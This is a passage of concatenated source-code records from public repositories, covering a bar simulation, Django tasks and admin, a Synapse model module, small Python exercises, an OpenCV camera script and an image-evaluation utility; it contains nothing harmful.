5))\nsns.heatmap(bartender_results)\nplt.ylabel(\"Liczba zatrudnionych barmanów płci męskiej\")\nplt.xlabel(\"Liczba zatrudnionych barmanów płci żeńskiej\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/barmani_ladni.pdf')\nelse:\n plt.show()\n\n# In[ ]:\n\nplt.figure(figsize = (8,5))\nsns.heatmap(path_matrix, cmap = 'seismic_r', center = 0)\nplt.ylabel(\"Liczba zatrudnionych barmanów płci męskiej\")\nplt.xlabel(\"Liczba zatrudnionych barmanów płci żeńskiej\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/opt_sciezka_ladni.pdf')\nelse:\n plt.show()\n\n# ## Próg cierpliwosci klientow\n# In[]:\n\n\npatience_results = np.zeros(11)\npatience_std = np.zeros(11)\n\nfor patience in tqdm.tqdm(range(len(patience_results))):\n results, _ = run_simulation(n_simulations=int(n_simulations), patience_threshold=patience)\n patience_results[patience] = results.mean()\n patience_std[patience] = results.std()\n\n\n# In[]:\n\n\nplt.figure(figsize = (8,4))\nplt.fill_between(np.arange(0, 11), y1 = patience_results - patience_std,\n y2 = patience_results + patience_std,\n alpha = 0.3)\nplt.plot(patience_results)\nplt.hlines(y = 0, xmin = 0, xmax = 10, linestyle = 'dashed')\nplt.xlabel('Próg cierpliwości [min]')\nplt.ylabel('Średni zysk baru [$]')\nif plot_saving_mode:\n plt.savefig('raport/wykresy/zajecie_w_kolejce.pdf')\nelse:\n plt.show()\n\n\n# ## Lepszy jakosciowo wystrój\n\n# In[]:\n\n\ndecor_results = np.zeros(20)\ndecor_ccount = np.zeros(20)\n\nfor decor in tqdm.tqdm(range(1, len(decor_results))):\n results, histories = run_simulation(\n n_simulations=n_simulations,\n bartenders = bartenders_opt,\n shootout_loss=20*decor, \n customer_lambda=(45 - 2*decor)) \n decor_results[decor] = results.mean()\n decor_ccount[decor] = np.mean([[x[1:3] for x in history].count(('Customer_choice', 'new')) for history in histories])\n\n\n# In[]:\n\n\nplt.figure(figsize = (8,4))\nplt.plot(decor_results)\nplt.xlabel('Jakość 
wystroju')\nplt.ylabel('Średni zysk baru [$]')\nplt.hlines(y = 0, xmin = 0, xmax = 20, linestyle = 'dashed')\nif plot_saving_mode:\n plt.savefig('raport/wykresy/wystroj.pdf')\nelse:\n plt.show()\n\n\n# # Unused scenarios\n# # Strzelaniny\n# In[]:\n\n\nresults_faster_shootout, _ = run_simulation(n_simulations=n_simulations, p_lost_everything=0.05)\nresults_normal_shootout, _ = run_simulation(n_simulations=n_simulations)\nresults_slower_shootout, _ = run_simulation(n_simulations=n_simulations, p_lost_everything=0.01)\n\n\n# In[]:\n\n\nprint(\"średnia:\")\nprint(\"szybciej strzelaniny: \" + str(results_faster_shootout.mean()))\nprint(\"normalne strzelaniny: \" + str(results_normal_shootout.mean()))\nprint(\"wolniejsze strzelaniny: \" + str(results_slower_shootout.mean()))\n\n\n# In[]:\n\n\nplt.figure(figsize=(8,4))\nf, axes = plt.subplots(1, 1)\ndf_to_plot = pd.DataFrame(\n {\n \"Prawdopodobieństwo strzelaniny\": \n [\"niskie\"] * n_simulations + \n [\"normalne\"] * n_simulations + \n [\"wysokie\"] * n_simulations,\n \"Przychód [$]\": np.concatenate((results_slower_shootout, results_normal_shootout, results_faster_shootout), axis=0)\n }\n)\nax = sns.barplot(x=\"Prawdopodobieństwo strzelaniny\", y=\"Przychód [$]\", data=df_to_plot, ci=\"sd\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/p_strzelaniny.pdf')\nelse:\n plt.show()\n\n","repo_name":"puchmichal/ZMS","sub_path":"project_3/simulation_do_wyslania.py","file_name":"simulation_do_wyslania.py","file_ext":"py","file_size_in_byte":17509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
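In the simulation record above, the poker branch appends `(clock[0], 'Customer_drinks') * n`, which repeats the tuple's elements rather than scheduling `n` separate events, and `get_next_event` scans the queue linearly for the earliest entry. Below is a minimal sketch of the presumably intended scheduling, using `heapq` so the next `(time, name)` event pops first; the heap-based queue is my substitution, not the script's own mechanism:

```python
import heapq

# Sketch of the event queue, assuming events are (time, name) tuples
# as in the simulation above; heapq keeps the earliest event at index 0.
events = []
heapq.heappush(events, (120, 'Poker_finish'))

# Presumed intent of the tuple multiplication: one 'Customer_drinks'
# event per remaining player, not a single concatenated tuple.
remaining_players = 3
for _ in range(remaining_players):
    heapq.heappush(events, (120, 'Customer_drinks'))

while events:
    clock = heapq.heappop(events)  # always the next event in time
    print(clock)
```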
+{"seq_id":"12296033732","text":"from django.core.mail import send_mail\nfrom app.celery import app\nfrom products.models import Product\nfrom users.models import User\nfrom products.subscriptions import (\n unsubscribe_from_product_arrival_notification\n)\n\nimport logging\n\n\nlogger = logging.getLogger()\n\n\ndef test_email_message(user, product, email=None) -> None:\n if not email:\n if not user.email:\n logger.error(f'error to send email to {email} of notification product arrived {product.id} -> no email')\n try:\n send_mail(\n subject='product arrival notification',\n message=f'hi ,{user}, {product} is arrived',\n from_email='django-store@example.com',\n recipient_list=[email],\n fail_silently=False,\n )\n except Exception as e:\n logger.error(f'error to send email to {email} of notification product arrived {product.id} -> {e}')\n\n\n@app.task\ndef send_product_arrival_notification(user_id, product_id) -> None:\n user = User.objects.get(id=user_id)\n product = Product.objects.get(id=product_id)\n test_email_message(\n user=user,\n product=product,\n )\n unsubscribe_from_product_arrival_notification(user, product_id)\n","repo_name":"w44121/django-store","sub_path":"src/products/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"71139795610","text":"import pytest\n\nfrom compute_wps import models\nfrom compute_wps.auth import traefik\nfrom compute_wps import exceptions\n\n@pytest.mark.django_db\ndef test_authenticate(mocker):\n meta = {}\n\n with pytest.raises(exceptions.AuthError):\n traefik.authenticate(meta)\n\n spy_user = mocker.spy(models.User.objects, \"get_or_create\")\n\n meta = {\"X-Forwarded-User\": \"user1@domain1.test\"}\n\n user = traefik.authenticate(meta)\n\n assert user.username == \"user1\"\n\n user = traefik.authenticate(meta)\n\n assert spy_user.call_count == 2\n\ndef test_traefikauthentication(mocker):\n auth = traefik.TraefikAuthentication()\n\n class Request:\n def META(self):\n return \"user1\"\n\n authenticate = mocker.patch.object(traefik, \"authenticate\")\n authenticate.return_value = None\n\n user = auth.authenticate(Request())\n\n assert user is None\n\n authenticate.return_value = \"user1\"\n\n user = auth.authenticate(Request())\n\n assert user == (\"user1\", None)\n","repo_name":"ESGF/esgf-compute-wps","sub_path":"compute/compute_wps/compute_wps/tests/test_auth_traefik.py","file_name":"test_auth_traefik.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"32"}
+{"seq_id":"41455921559","text":"import logging\n\nimport synapse.common as s_common\nimport synapse.lib.tufo as s_tufo\nfrom synapse.lib.module import CoreModule, modelrev\n\nlogger = logging.getLogger(__name__)\n\nclass SynMod(CoreModule):\n @staticmethod\n def getBaseModels():\n modl = {\n\n 'types': (\n ('syn:splice', {'subof': 'guid'}),\n ('syn:auth:user', {'subof': 'str'}),\n ('syn:auth:role', {'subof': 'str'}),\n ('syn:auth:userrole', {'subof': 'comp', 'fields': 'user=syn:auth:user,role=syn:auth:role'}),\n ('syn:tagform', {'subof': 'comp', 'fields': 'tag,syn:tag|form,syn:prop', 'ex': '(foo.bar,baz:faz)'}),\n\n ('syn:alias', {'subof': 'str', 'regex': r'^\\$[a-z_]+$',\n 'doc': 'A synapse guid alias', 'ex': '$visi'}),\n ('syn:fifo', {'subof': 'comp', 'fields': 'name=str:lwr'}),\n ('syn:ingest', {'subof': 'str:lwr'}),\n ('syn:log', {'subof': 'guid'}),\n\n ),\n\n 'forms': (\n\n ('syn:splice', {'local': 1}, (\n ('act', {'ptype': 'str:lwr'}),\n ('time', {'ptype': 'time'}),\n ('node', {'ptype': 'guid'}),\n ('user', {'ptype': 'str:lwr'}),\n\n ('tag', {'ptype': 'str:lwr'}),\n ('form', {'ptype': 'str:lwr'}),\n ('valu', {'ptype': 'str:lwr'}),\n )),\n\n ('syn:alias', {'local': 1}, (\n ('iden', {'ptype': 'guid', 'defval': '*',\n 'doc': 'The GUID for the given alias name'}),\n )),\n\n ('syn:auth:user', {'local': 1}, (\n ('storm:limit:lift',\n {'ptype': 'int', 'defval': 10000, 'doc': 'The storm query lift limit for the user'}),\n ('storm:limit:time',\n {'ptype': 'int', 'defval': 120, 'doc': 'The storm query time limit for the user'}),\n )),\n\n ('syn:auth:role', {'local': 1}, (\n ('desc', {'ptype': 'str'}),\n )),\n\n ('syn:auth:userrole', {'local': 1}, (\n ('user', {'ptype': 'syn:auth:user'}),\n ('role', {'ptype': 'syn:auth:role'}),\n )),\n\n ('syn:fifo', {'ptype': 'syn:fifo', 'local': 1}, (\n ('name', {'ptype': 'str:lwr', 'doc': 'The fifo description'}),\n ('desc', {'ptype': 'str', 'doc': 'The fifo description'}),\n )),\n\n ('syn:trigger', {'ptype': 'guid', 'local': 1}, (\n ('en', {'ptype': 'bool', 'defval': 0, 'doc': 'Is the trigger currently enabled'}),\n ('on', {'ptype': 'syn:perm'}),\n ('run', {'ptype': 'syn:storm'}),\n ('user', {'ptype': 'syn:auth:user'}),\n )),\n\n ('syn:core', {'doc': 'A node representing a unique Cortex'}, ()),\n ('syn:form', {'doc': 'The base form type.'}, (\n ('doc', {'ptype': 'str', 'doc': 'basic form definition'}),\n ('ver', {'ptype': 'int', 'doc': 'form version within the model'}),\n ('model', {'ptype': 'str', 'doc': 'which model defines a given form'}),\n ('ptype', {'ptype': 'syn:type', 'doc': 'Synapse type for this form'}),\n ('local', {'ptype': 'bool', 'defval': 0,\n 'doc': 'Flag used to determine if a form should not be included in splices'}),\n )),\n ('syn:prop', {'doc': 'The base property type.'}, (\n ('doc', {'ptype': 'str', 'doc': 'Description of the property definition.'}),\n ('title', {'ptype': 'str', 'doc': 'A short description of the property definition.'}),\n ('form', {'ptype': 'syn:prop', 'doc': 'The form of the property.'}),\n ('ptype', {'ptype': 'syn:type', 'doc': 'Synapse type for this field'}),\n ('req', {'ptype': 'bool', 'doc': 'Set to 1 if this property is required to form teh node.'}),\n ('relname', {'ptype': 'str', 'doc': 'Relative name of the property'}),\n ('base', {'ptype': 'str', 'doc': 'Base name of the property'}),\n ('glob', {'ptype': 'bool', 'defval': 0, 'doc': 'Set to 1 if this property defines a glob'}),\n ('defval', {'doc': 'Set to the default value for this property', 'glob': 1}),\n ('univ', {'ptype': 'bool',\n 'doc': 'Specifies if a 
prop is universal and has no form associated with it.'}),\n )),\n ('syn:type', {'doc': 'The base type type.'}, (\n ('ctor', {'ptype': 'str', 'doc': 'Python path to the class used to instantiate the type.'}),\n ('subof', {'ptype': 'syn:type', 'doc': 'Type which this inherits from.'}),\n ('*', {'glob': 1})\n )),\n ('syn:tag', {'doc': 'The base form for a synapse tag.'}, (\n ('up', {'ptype': 'syn:tag', 'doc': ''}),\n ('doc', {'ptype': 'str', 'defval': '', }),\n ('depth', {'ptype': 'int', 'doc': 'How deep the tag is in the hierarchy', 'defval': 0}),\n ('title', {'ptype': 'str', 'doc': '', 'defval': ''}),\n ('base', {'ptype': 'str', 'doc': '', 'ro': 1}),\n\n )),\n ('syn:tagform', {'doc': 'A node describing the meaning of a tag on a specific form'}, (\n ('tag', {'ptype': 'syn:tag', 'doc': 'The tag being documented', 'ro': 1}),\n ('form', {'ptype': 'syn:prop', 'doc': 'The form that the tag applies too', 'ro': 1}),\n ('doc', {'ptype': 'str:txt', 'defval': '??',\n 'doc': 'The long form description for what the tag means on the given node form'}),\n ('title', {'ptype': 'str:txt', 'defval': '??',\n 'doc': 'The short name for what the tag means the given node form'}),\n )),\n ('syn:model', {'ptype': 'str', 'doc': 'prefix for all forms with in the model'}, (\n ('hash', {'ptype': 'guid', 'doc': 'version hash for the current model'}),\n ('prefix', {'ptype': 'syn:prop', 'doc': 'Prefix used by teh types/forms in the model'}),\n )),\n ('syn:seq', {'ptype': 'str:lwr', 'doc': 'A sequential id generation tracker'}, (\n ('width', {'ptype': 'int', 'defval': 0, 'doc': 'How many digits to use to represent the number'}),\n ('nextvalu', {'ptype': 'int', 'defval': 0, 'doc': 'The next sequential value'}),\n )),\n ('syn:ingest', {'ptype': 'syn:ingest', 'local': 1}, (\n ('time', {'ptype': 'time'}),\n ('text', {'ptype': 'json'})\n )),\n ('syn:log', {'ptype': 'guid', 'local': 1}, (\n ('subsys', {'ptype': 'str', 'defval': '??',\n 'doc': 'Named subsystem which originaed teh log event'}),\n ('level', {'ptype': 'int', 'defval': logging.WARNING, }),\n ('time', {'ptype': 'time', 'doc': 'When the log event occured'}),\n ('exc', {'ptype': 'str', 'doc': 'Exception class name if caused by an exception'}),\n ('info:*', {'glob': 1})\n )),\n )\n }\n\n name = 'syn'\n return ((name, modl),)\n\n @modelrev('syn', 201709051630)\n def _delOldModelNodes(self):\n types = self.core.getRowsByProp('syn:type')\n forms = self.core.getRowsByProp('syn:form')\n props = self.core.getRowsByProp('syn:prop')\n syncore = self.core.getRowsByProp('.:modl:vers:syn:core')\n\n with self.core.getCoreXact():\n [self.core.delRowsById(r[0]) for r in types]\n [self.core.delRowsById(r[0]) for r in forms]\n [self.core.delRowsById(r[0]) for r in props]\n [self.core.delRowsById(r[0]) for r in syncore]\n\n @modelrev('syn', 201709191412)\n def _revModl201709191412(self):\n '''\n Migrate the XREF types to use the propvalu syntax.\n '''\n tick = s_common.now()\n adds = []\n dels = set()\n\n nforms = set()\n\n for form in self.core.getModelDict().get('forms'):\n sforms = self.core.getTypeOfs(form)\n if 'xref' in sforms:\n nforms.add(form)\n\n for ntyp in nforms:\n nodes = self.core.getTufosByProp(ntyp)\n xtyp = '{}:xtype'.format(ntyp)\n xrefp = '{}:xref'.format(ntyp)\n xrefpint = '{}:xref:intval'.format(ntyp)\n xrefpstr = '{}:xref:strval'.format(ntyp)\n xrefprop = '{}:xref:prop'.format(ntyp)\n for node in nodes:\n iden = node[0]\n srcvtype = node[1].get(xtyp)\n if srcvtype is None:\n # This is expensive node level introspection :(\n for prop, valu in 
s_tufo.props(node).items():\n if prop.startswith('xref:'):\n form = prop.split('xref:', 1)[1]\n if self.core.isTufoForm(form):\n srcvtype = form\n break\n if not srcvtype:\n raise s_common.NoSuchProp(iden=node[0], type=ntyp,\n mesg='Unable to find a xref prop which is a form for migrating a '\n 'XREF node.')\n srcprp = '{}:xref:{}'.format(ntyp, srcvtype)\n srcv = node[1].get(srcprp)\n valu, subs = self.core.getPropNorm(xrefp, [srcvtype, srcv])\n adds.append((iden, xrefp, valu, tick))\n adds.append((iden, xrefprop, srcvtype, tick))\n if 'intval' in subs:\n adds.append((iden, xrefpint, subs.get('intval'), tick))\n else:\n adds.append((iden, xrefpstr, subs.get('strval'), tick))\n dels.add(srcprp)\n dels.add(xtyp)\n with self.core.getCoreXact():\n self.core.addRows(adds)\n for prop in dels:\n self.core.delRowsByProp(prop)\n\n @modelrev('syn', 201710191144)\n def _revModl201710191144(self):\n with self.core.getCoreXact():\n now = s_common.now()\n adds = []\n logger.debug('Lifting tufo:form rows')\n for i, _, v, t in self.core.store.getRowsByProp('tufo:form'):\n adds.append((i, 'node:created', t, now),)\n logger.debug('Deleting existing node:created rows')\n self.core.store.delRowsByProp('node:created')\n if adds:\n tot = len(adds)\n logger.debug('Adding {:,d} node:created rows'.format(tot))\n i = 0\n n = 100000\n for chunk in s_common.chunks(adds, n):\n self.core.store.addRows(chunk)\n i = i + len(chunk)\n logger.debug('Loading {:,d} [{}%] rows into transaction'.format(i, int((i / tot) * 100)))\n logger.debug('Finished adding node:created rows to the Cortex')\n\n @modelrev('syn', 201711012123)\n def _revModl201711012123(self):\n now = s_common.now()\n forms = sorted(self.core.getTufoForms())\n nforms = len(forms)\n for n, form in enumerate(forms):\n adds = []\n logger.debug('Computing node:ndef rows for [{}]'.format(form))\n for i, p, v, t in self.core.store.getRowsByProp(form):\n # This is quicker than going through the norm process\n nv = s_common.guid((p, v))\n adds.append((i, 'node:ndef', nv, now))\n\n if adds:\n tot = len(adds)\n logger.debug('Adding {:,d} node:ndef rows for [{}]'.format(tot, form))\n with self.core.getCoreXact() as xact:\n i = 0\n nt = 100000\n for chunk in s_common.chunks(adds, nt):\n self.core.store.addRows(chunk)\n i = i + len(chunk)\n logger.debug('Loading {:,d} [{}%] rows into transaction'.format(i, int((i / tot) * 100)))\n logger.debug('Processed {:,d} [{}%] forms.'.format(n, int((n / nforms) * 100)))\n logger.debug('Finished adding node:ndef rows to the Cortex')\n","repo_name":"larrycameron80/synapse","sub_path":"synapse/models/syn.py","file_name":"syn.py","file_ext":"py","file_size_in_byte":12757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"}
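The `_revModl201710191144` and `_revModl201711012123` migrations above push their `addRows` calls through `s_common.chunks` to keep each transaction bounded. A minimal, dependency-free sketch of that chunking idiom, with the `chunks` helper reimplemented here and the row shape and batch size mirroring the migration:

```python
def chunks(items, size):
    """Yield successive slices of at most `size` elements."""
    for i in range(0, len(items), size):
        yield items[i:i + size]

rows = [(i, 'node:created', 0, 0) for i in range(250_000)]
loaded = 0
for batch in chunks(rows, 100_000):
    # a real migration would call store.addRows(batch) here
    loaded += len(batch)
print(loaded)  # 250000
```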
+{"seq_id":"30185593592","text":"from django.contrib import admin\nfrom models import (Province, District, Zone, School)\nfrom rts.utils import DistrictIdFilter, ManagePermissions\nfrom rts.actions import export_select_fields_csv_action\n\n\n\nclass ProvinceAdmin(ManagePermissions):\n actions = [export_select_fields_csv_action(\"Export selected objects as CSV file\")]\n list_display = [\"name\"]\n\n\nclass DistrictAdmin(ManagePermissions):\n actions = [export_select_fields_csv_action(\"Export selected objects as CSV file\")]\n list_display = [\"name\", \"province\"]\n\n\nclass ZoneAdmin(ManagePermissions):\n actions = [export_select_fields_csv_action(\"Export selected objects as CSV file\")]\n list_display = [\"name\", \"district\"]\n search_fields = [\"name\"]\n\n\nclass SchoolAdmin(ManagePermissions):\n actions = [export_select_fields_csv_action(\"Export selected objects as CSV file\")]\n list_display = [\"emis\", \"name\", \"zone\", \"display_district\", \"display_province\"]\n search_fields = [\"emis\"]\n\n def formfield_for_foreignkey(self, db_field, request, **kwargs):\n if db_field.name == \"zone\":\n kwargs[\"queryset\"] = Zone.objects.order_by('name')\n return super(SchoolAdmin, self).formfield_for_foreignkey(db_field, request, **kwargs)\n\n def queryset(self, request):\n \"\"\"\n Limits queries for pages that belong to district admin\n \"\"\"\n qs = super(SchoolAdmin, self).queryset(request)\n return DistrictIdFilter(parent=self, request=request, qs=qs).queryset()\n\n\nadmin.site.register(Province, ProvinceAdmin)\nadmin.site.register(District, DistrictAdmin)\nadmin.site.register(Zone, ZoneAdmin)\nadmin.site.register(School, SchoolAdmin)\n","repo_name":"praekeltfoundation/django-rts-zambia","sub_path":"hierarchy/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"71567680732","text":"class Drink:\n _cups = [\"레귤러\",\"점보\"]\n _ices = [\"0%\", \"50%\", \"100%\", \"150%\"]\n _sugar = [\"0%\", \"50%\", \"100%\", \"150%\"]\n def __init__(self, name, price):\n self.name=name\n self.price=price\n self.cup=0#0:레귤러,1: 점보\n self.ice=2 #0:0%, 1:50%,2:100$, 3:150$ \n self.sugar =2 #0:0%, 1=50%,2=100%, 3=150%\n\n def set_cup(self):\n self.cup = input (\"컵사이즈를 선택하세요(0:레귤러, 1=점보)\")\n if self.cup==\"\":\n self.cup=0\n else:\n self.cup= int (self.cup)\n \n\n def set_ice(self):\n self.ice = input(\"얼음량을 선택하세요(0:0%, 1:50%,2:100%, 3:150% \")\n if self.ice==\"\":\n self.ice=2\n else:\n self.ice= int (self.ice)\n\n def set_sugar(self):\n self.sugar = input(\"당도를 선택하세요. 0:0%, 1=50%,2=100%, 3=150%\")\n if self.sugar==\"\":\n self.sugar=2\n else:\n self.sugar= int (self.ice)\n \n def __str__(self):\n return \"이름:\"+self.name+\"\\t가격: \"+str(self.price)+\"\\t컵사이즈: \"+self._cups[self.cup]+\"\\t얼음량: \"+self._ices[self.ice]+\"\\t당도:\"+self._sugar[self.sugar]\n \n def order(self):\n self.set_cup()\n self.set_ice()\n self.set_sugar()","repo_name":"gyogo/Programming-Python-","sub_path":"아마스빈/drink.py","file_name":"drink.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"39873469883","text":"from rest_framework.permissions import IsAuthenticated\r\nfrom rest_framework.response import Response\r\n\r\nfrom components.comments.models import UserCommentsModel\r\nfrom components.comments.serializers import (\r\n UserCommentsListModelSerializer,\r\n)\r\nfrom components.metrics.models import WeatherMetricsModel\r\nfrom shared.api.views import QueryModelViewSet\r\n\r\n\r\nclass UserCommentsQueryModelViewSet(QueryModelViewSet):\r\n \"\"\"QueryModelViewSet для работы с комментариями пользователя\"\"\"\r\n\r\n queryset = UserCommentsModel.objects.all().order_by('created')\r\n serializer_class = UserCommentsListModelSerializer\r\n permission_classes = [IsAuthenticated]\r\n pagination_class = None\r\n\r\n def list(self, request, *args, **kwargs):\r\n queryset = self.filter_queryset(self.get_queryset())\r\n if 'metricId' in request.query_params:\r\n metric_id = int(request.query_params.get('metricId'))\r\n metric_model = WeatherMetricsModel.objects.get(id=metric_id)\r\n queryset = self.queryset.filter(weather_metric=metric_model)\r\n\r\n serializer = self.get_serializer(queryset, many=True)\r\n return Response(serializer.data)\r\n","repo_name":"thebadfordota/Robolife2","sub_path":"backend/components/comments/views/user_comments_query_model_viewset.py","file_name":"user_comments_query_model_viewset.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"}
+{"seq_id":"15674923903","text":"\r\n\r\na = []\r\nwhile True:\r\n flag = input(\"是否输入,若回答yes则继续输入,若回答no则停止输入\")\r\n if flag == \"yes\":\r\n while True:\r\n c = eval(input(\"请输入成绩:\"))\r\n if c < 0 or c > 100:\r\n print(\"输入错误,请重新输入\")\r\n else:\r\n a.append(c)\r\n break\r\n elif flag == \"no\":\r\n break\r\n\r\ngeshu = len(a)\r\nzongfen = 0\r\nfor i in a:\r\n zongfen = zongfen + i\r\npingjunfen = zongfen/geshu\r\nzuigao = max(a)\r\n\r\nprint(\"共输入了\", geshu, \"个成绩\", \"总成绩为\", zongfen,\r\n \"平均分为\", pingjunfen, \"最高分为\", zuigao)\r\n","repo_name":"qaq112233/PythonWork","sub_path":"第10周/31计算成绩.py","file_name":"31计算成绩.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"22419068715","text":"import cv2\nprint(cv2.__version__)\nevt=-1\ncoord=[]\ndef click(event,x,y,flag,params):\n global pnts\n global evt\n if event==cv2.EVENT_LBUTTONDOWN:\n print('Mouse Event Was: ',event)\n print(x,',',y)\n pnts=(x,y)\n coord.append(pnts)\n print(coord)\n evt=event\ndispW=640\ndispH=480\nflip=0\ncv2.namedWindow('picam')\ncv2.setMouseCallback('picam',click)\n#Uncomment These next Two Line for Pi Camera\ncamSet='nvarguscamerasrc ! video/x-raw(memory:NVMM), width=3264, height=2464, format=NV12, framerate=21/1 ! nvvidconv flip-method='+str(flip)+' ! video/x-raw, width='+str(dispW)+', height='+str(dispH)+', format=BGRx ! videoconvert ! video/x-raw, format=BGR ! appsink'\ncam= cv2.VideoCapture(camSet)\n \n#Or, if you have a WEB cam, uncomment the next line\n#(If it does not work, try setting to '1' instead of '0')\n#cam=cv2.VideoCapture(0)\nwhile True:\n ret, frame = cam.read()\n for pnts in coord:\n cv2.circle(frame,pnts,5,(0,255,255),-3)\n font=cv2.FONT_HERSHEY_PLAIN\n myStr=str(pnts)\n cv2.putText(frame,myStr,pnts,font,1,(0,0,0),2)\n cv2.imshow('picam',frame)\n cv2.moveWindow('picam',0,0)\n keyEvent=cv2.waitKey(1)\n if keyEvent==ord('q'):\n break\n if keyEvent==ord('c'):\n coord=[]\ncam.release()\ncv2.destroyAllWindows()\n ","repo_name":"ANGELARIELPLAZA/CURSO-JETSON-NANO","sub_path":"CURSO_JETSON_NANO_IA/JETSON_NANO/opencv/opencv-coordenadas.py","file_name":"opencv-coordenadas.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"37105642704","text":"import sys\n\ninput_str=sys.stdin.readline().strip()\nalpabet=[[0 for j in range(len(input_str)+1)] for i in range(26)]\nq_count=int(sys.stdin.readline().strip())\n\n#알파벳의 아스키코드를 이용하여 알파벳들의 위치를 저장한다.\nfor k in range(len(input_str)):\n alpabet[ord(input_str[k])-97][k+1]=1\n\n#알파벳의 아스키코드를 이용하여 알파벳들의 prefix count를 구한다.\nfor a in range(26):\n for j in range(len(input_str)):\n alpabet[a][j+1]=alpabet[a][j]+alpabet[a][j+1]\n\n#출력한다.\nfor b in range(q_count):\n c,start,end=sys.stdin.readline().split()\n print(alpabet[ord(c)-97][int(end)+1]-alpabet[ord(c)-97][int(start)])","repo_name":"styughjvbn/Algorithm_study","sub_path":"week1-10/week1/3_16139.py","file_name":"3_16139.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"24432054714","text":"from nha.evaluation import metrics as nha_metrics\nimport torch.nn as nn\nimport nha.models\nfrom nha.util.general import *\nfrom nha.data.real import digitize_segmap\n\nimport torch\nimport torchvision.transforms.functional as ttF\n\nfrom typing import *\nfrom tqdm import tqdm\nfrom collections import OrderedDict\n\n\nclass Evaluator:\n \"\"\"\n class to conveniently calculate various scores for predicted images.\n Attention: Keep in mind to blur mask before doing alpha merging such\n that CPBD (sharpness evaluation) is not influenced by these edge artifacts!\n \"\"\"\n\n def __init__(\n self,\n metrics=[\"L1\", \"L2\", \"PSNR\", \"MS_SSIM\", \"LMK\", \"LPIPS\", \"CPBD\"],\n device=\"cuda\",\n load_bbx_detector=False,\n ):\n \"\"\"\n :param metrics: a list of metrics to include in the evaluation process\n :param device: where to run the evaluation\n \"\"\"\n\n # ensures that if LMK in metrics, its calculated first such that bbs that were detected on the way can be reused\n self._metrics = OrderedDict()\n if \"LMK\" in [m.upper() for m in metrics]:\n metrics = list(metrics)\n metrics.remove(\"LMK\")\n metrics = [\"LMK\"] + metrics\n\n self._device = device\n self._bbx_detector = (\n nha_metrics.FaceBBxDetector(device) if load_bbx_detector else None\n )\n\n for m in metrics:\n m = m.upper()\n if m == \"LMK\":\n self._metrics[\"LMK\"] = nha_metrics.EuclLmkDistance(device)\n elif m == \"L1\":\n self._metrics[\"L1\"] = nn.L1Loss(reduction=\"none\")\n elif m == \"L2\":\n self._metrics[\"L2\"] = nn.MSELoss(reduction=\"none\")\n elif m == \"MS_SSIM\":\n self._metrics[\"MS_SSIM\"] = nha_metrics.MS_SSIM(device)\n elif m == \"PSNR\":\n self._metrics[\"PSNR\"] = nha_metrics.PSNR(device)\n elif m == \"LPIPS\":\n self._metrics[\"LPIPS\"] = nha_metrics.LPIPS(device)\n elif m == \"CPBD\":\n self._metrics[\"CPBD\"] = nha_metrics.CPBD(device)\n\n def __call__(\n self,\n pred: torch.Tensor,\n gt: torch.Tensor,\n reduction=\"none\",\n bbs=None,\n gt_landmarks=None,\n ):\n \"\"\"\n returns dictionary with evaluation scores for L1, L2, PSNR, MS_SSIM, LMK, LPIPS, CPBD.\n If reduction==\"none\", each dictionary value is a torch tensor of length N.\n If reduction in [\"mean\", \"sum\"], dict values are scalar tensors\n :param pred: torch tensor of shape N x 3 x H x W with entries -1 ... +1\n todo add predicted landmarks\n :param gt: torch.tensor of shape N x 3 x H x W with entries -1 ... +1\n :param bbs: None or np array of shape N x 5\n :param gt_landmarks: None or np array of shape N x 68 x 2\n :param reduction: How to reduce scores along N dim. 
One of\n - \"none\": no reduction, scores will have length N\n - \"mean\": scalar scores\n :return:\n \"\"\"\n\n scores = dict()\n pred = pred.to(self._device)\n gt = gt.to(self._device)\n\n for name, metric in self._metrics.items():\n if name in [\"L1\", \"L2\"]:\n scores[name] = torch.flatten(metric(pred, gt), start_dim=1).mean(dim=-1)\n elif name == \"LMK\":\n scores[name], bbs = metric(pred, gt, return_bbs=True, bbs=bbs)\n elif name == \"CPBD\":\n scores[name] = metric(pred)\n else:\n scores[name] = metric(pred, gt)\n\n if reduction == \"mean\":\n for key, val in scores.items():\n scores[key] = torch.mean(val)\n if reduction == \"sum\":\n for key, val in scores.items():\n scores[key] = torch.sum(val)\n\n return scores\n\n\n@torch.no_grad()\ndef evaluate_models(\n models: OrderedDict,\n dataloader,\n metrics=[\"L1\", \"L2\", \"PSNR\", \"MS_SSIM\", \"LMK\", \"LPIPS\", \"CPBD\"],\n blur_seg=0.0,\n):\n \"\"\"\n evaluates the performances of several models and creates a comparison dictionary. Keys are the same as given in\n 'models'; vals are dictionaries with keys:\n - [Metric] ... contains evaluated metrics score as float\n\n :param models: dict where key are the model names, each value is another dict with keys\n 'ckpt' (path to checkpoint file) and 'type' str model type identifier as defined in\n nha.util.models.__init__\n e.g.: {\"model_A\": \"/path/to/checkpoint\"},\n \"model_B\": ..., }\n\n\n :param dataloader: validation dataloader\n :param blur_seg: specifies factor to blur segmentation masks by before doing bg filling. If 0 has no effect. May\n be used for more useful cpbd score evaluation\n :param debug: if true: plots example of 